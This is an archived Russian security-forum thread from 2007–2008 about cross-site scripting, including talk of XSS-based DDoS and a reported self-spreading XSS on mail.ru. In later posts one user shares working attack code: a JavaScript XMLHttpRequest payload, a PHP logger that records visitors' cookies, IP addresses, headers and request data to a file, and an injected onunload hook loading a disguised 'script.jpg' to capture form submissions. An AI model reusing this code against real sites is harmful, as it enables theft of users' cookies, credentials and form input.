ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.06.2007, 23:33
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
За статью +, но есть некоторые замечания
Статья уже давно готовилась мной, ее предтече стало ВОТ ЭТО голосование, в котором многие заявили что xss это уязвиость вчеращнего дня, сейчас я попытаюсь опровергнуть это утверждение.
Так и не увидел опровержения утверждения, ничего нового.
Все тоже самое достаточно хорошо и более подробно описано здесь http://forum.antichat.ru/threadedpost386598.html#post386598
Основная масса людей считают что xss может использоваться только для кражи cookies, либо исключительно ради эстетического удовольствия лицезрения красивых окошек с различными надписями))
А сам опять про это пишешь...
Да, кстати, а что есть светлая сторона xss?  |
|
|
16.06.2007, 23:35
|
|
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164
Репутация:
0
|
|
Сообщение от Isis
Ничего нового не узнал...
Про ддос вообще бред...сколько же надо лохов найти =\
Да и все что здесь написано также можно найти с помощью поиска
про ддос через xss это не бред. В свое время один человек запустил такую штуку на mail.ru . Т е там был xss скрипт полсле открытия письма которые рассылался по контактам и плюс создавал кучу конетков к сайту. В то время кстати мне пришлось доказывать маил ру что это вирус.
|
|
|
|
17.06.2007, 12:32
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796
Репутация:
1095
|
|
а что такое по-твоему xss-вектор? мне кажется ты нескольно неверно уяснил для себя значение этого слова..
насчет ддос - это не бред, я как-то хотел раскрутить один сайтик и немного не расчитав, ненадолго убил его.. )
кстати, с помощью xss ведь можно устроить и просто дос-атаку..
|
|
|
|
17.06.2007, 23:12
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Как я понимаю, xss вектор- это непосредственно яваскрипт код, который выполняется в браузере жертвы, т.е
<script>alert('xss')</script> - alert('xss')- xss вектор
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
19.06.2007, 06:24
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
Вообще то про ддос - это не бред, это реально но ее воплотить будет трудновато.
|
|
|
|
24.06.2007, 05:11
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
вообще то ДДос реализовать проще чем можно подумть на первый взгляд, особенно если xss на более менее популярной страничке
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
24.03.2008, 21:58
|
|
Новичок
Регистрация: 20.09.2007
Сообщений: 17
Провел на форуме:
103803
Репутация:
2
|
|
xчувак,перезалей видео плз,я никак не вьезжаю=)буду благадарен
|
|
|
|
27.05.2008, 17:24
|
|
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234
Репутация:
56
|
|
И все же вопрос про XMLHttpRequest. про то что работа с удаленным сервером не получится - это понятно. но ни как не могу понять как получить пост и гет. куки и $_SERVER передаются, а вот пост и гет ну ни как. подскажите что нужно дополнить в код
Код:
<script type="text/javascript">
function processReqChange() {
//document.form.state.value = stat(req.readyState);
if (req.readyState == 4) {
// clearTimeout(reqTimeout);
// document.form.statusnum.value = req.status;
// document.form.status.value = req.statusText;
// only if "OK"
if (req.status == 200) {
// document.form.response.value=req.responseText;
} else {
alert("Не удалось получить данные:\n" + req.statusText);
}}}
function HTTPRequest (url)
{
if (window.XMLHttpRequest){
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open("POST" | "GET", url, true);
req.send(null);
}else if (window.ActiveXObject){
req = new
ActiveXObject("Microsoft.XMLHTTP");
if (req){
req.onreadystatechange = processReqChange;
req.open("POST" | "GET", url, true);
req.send();
}
}
return (req.responseText);
}
var XSSCode = HTTPRequest ("pro.php");
</script>
<FORM action="form.php" method="POST">
<input type="text" name="text">
<input type="submit">
</FORM>
файл php:
Код:
<?php
$time = date("M j G:i:s T Y");
$cook = "";
while (list($key,$value)=each($_COOKIE)) {
$cook = $cook . $key . ':' . $value . "\n";
}
$client = "=====================" . $time . "========================== \n
Client ip: ". $_SERVER['REMOTE_ADDR'] . "\n
Client dns: ". $_SERVER['REMOTE_HOST'] . "\n
X-Forwarded-for: ". $_SERVER['HTTP_X_FORWARDED_FOR'] . "\n
Via: ". $_SERVER['HTTP_VIA'] . "\n
COOKIE: ". $cook . "\n
-----------------POST DATA--------------------\n";
$xss = $_GET;
$que = "";
$filename = "somefile.txt";
while (list($key,$value)=each($xss)) {
$que = $que . $key . ':' . $value . "\n";
}
$pos = $que . "=============================================== \n";
$data = $client . $pos;
//print_r ($xss);
// Если файл существует и в него возможна запись
if ( is_writeable($filename) ) :
// Открыть файл и установить указатель текущей позиции в конец файла
$fh = fopen($filename, "a+");
// Записать содержимое $data в файл
@fwrite($fh, $data);
// Закрыть файл
fclose($fh); else :
print "Could not open Sfilename for writing";
endif;
?>
|
|
|
|
28.05.2008, 23:56
|
|
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234
Репутация:
56
|
|
Вроде понял где у меня ошибка:
Я думал данные отправленные из формы будут дублированы по XMLHttpRequest, но оказывается нужно явно указывать params. Я правильно понял? то есть теперь необходимо из формы взять данные и вставить в params. А как можно это сделать не модифицируя саму форму? Спасибо и с меня +)
|
|
|
|
09.06.2008, 21:58
|
|
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234
Репутация:
56
|
|
Такс. в общем провел нужный мне аудит, думаю можно рассказать каким образом провел свою xss.
Так как полного раскрытия темы не нашел ни здесь ни в гугле - думаю может кому то еще пригодится, а может кто то подскажет как можно еще более эффективно юзать xmlhttprequest и так
ко всему выше сказанному необходимо получение данных из формы. я использовал объект document.form1.text.value
и вот тут необходимо вызвать действие при сабмите. а модифицировать форму не могу. Пришла на выручку особенность всех браузеров обрабатывать в документе body несколько раз! И таким образом прописав в середине
Код HTML:
</body>
<body onunload="HTTPRequest ('/dirupload/simple.php?')">
<script type="text/javascript" src="/dirupload/script.jpg"></script>
Ну а прояснить все нюансы помгла инфа вот здесь
http://xmlhttprequest.ru/
Полностью доступным языком описан данный объект
ЗЫ
Говорят есть обход ограничения выполнения на локалхосте. но не было времени с этим разобраться. |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?389481){kind=avatar}
Линейный вид
